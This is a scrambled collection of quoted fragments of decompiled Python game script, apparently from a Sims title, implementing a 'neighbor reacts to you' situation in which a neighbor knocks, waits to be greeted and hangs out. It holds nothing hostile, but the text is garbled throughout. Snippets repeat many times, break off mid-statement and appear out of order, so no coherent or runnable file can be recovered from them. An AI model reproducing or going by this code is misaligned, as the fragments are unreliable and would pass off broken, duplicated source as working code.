"= early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info",
"self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if",
"of loot to apply between the neighbor and the active\\n household Sims if",
"', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for",
"'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be greeted.\\n ',",
"wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim",
"'_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod",
"= sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id",
"23:17:14 # Size of source mod 2**32: 9737 bytes import random from event_testing.resolver",
"+ Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)),",
"return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs)",
"'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls):",
"to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the",
"class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker",
"(super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def",
"neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState())",
"Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for",
"# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64",
"'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1,",
"import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args,",
"to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role",
"LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList",
"= None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def",
"*args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def",
"# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of",
"9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from",
"= random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation,",
"**kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state())",
"SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import",
"'_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def",
"sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver",
"sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation",
"*args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state())",
"SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from",
"source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot",
"for the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation",
"[(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim",
"= [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home",
"self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class",
"Size of source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver",
"INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n",
"self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State",
"# Size of source mod 2**32: 9737 bytes import random from event_testing.resolver import",
"State for the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n",
"bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning",
"locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for a",
"RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory,",
"services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(),",
"Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for",
"not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id",
"from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo,",
"services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name))",
"stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of",
"is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True))",
"TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import",
"BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState,",
"# Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17",
"will be shown when this situation state times\\n out.\\n ')} def __init__(self, *args,",
"times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state",
"mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import",
"from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def",
"= services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()},",
"resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def",
"Situation state for the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation':",
"active household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that",
"from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import",
"in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver =",
"neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze',",
"that will be shown when this situation state times\\n out.\\n ')} def __init__(self,",
"T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737",
"Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes import",
"**kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self):",
"_NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def",
"# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python",
"_KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of",
"SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass",
"active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot",
"Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job',",
"timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot:",
"Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import",
"blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info",
"')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal')",
"Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020,",
"def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info",
"services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id,",
"def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return",
"SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return",
"from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet",
"sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info()",
"__init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim,",
"loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog()",
"the active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A",
"shown when this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None,",
"3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug",
"hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State",
"SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class",
"class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the",
"None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls):",
"for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for",
"if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class",
"{'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor and the active\\n",
"def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info",
"')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification",
"'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2,",
"neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if",
"**kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply",
"uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9",
"guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info()",
"State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only',",
"True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for a while.\\n",
"('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES +",
"from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from",
"in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs):",
"return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list",
"return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n",
"*args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if",
"this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when",
"situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs)",
"import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from",
"_on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info =",
"neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id =",
"= early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver",
"this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all",
"# Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes",
"in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct()",
"_StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls):",
"for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None",
"job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor()",
"RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData,",
"self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod",
"v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22",
"state for the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}),",
"if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE),",
"Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name:",
"neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if",
"'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES",
"knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim",
"import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim,",
"SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types",
"_get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args,",
"early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self,",
"= services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True,",
"active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list =",
"sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self,",
"_NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def",
"when this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs):",
"from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs):",
"for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver)",
"REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') +",
"{'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n ', locked_args={'time_out':None,",
"@classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None",
"super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id =",
"bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 #",
"filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info =",
"import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import",
"class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list",
"state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot",
"of source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from",
"gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if",
"result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation()",
"RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES",
"cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job),",
"from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState",
"resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n",
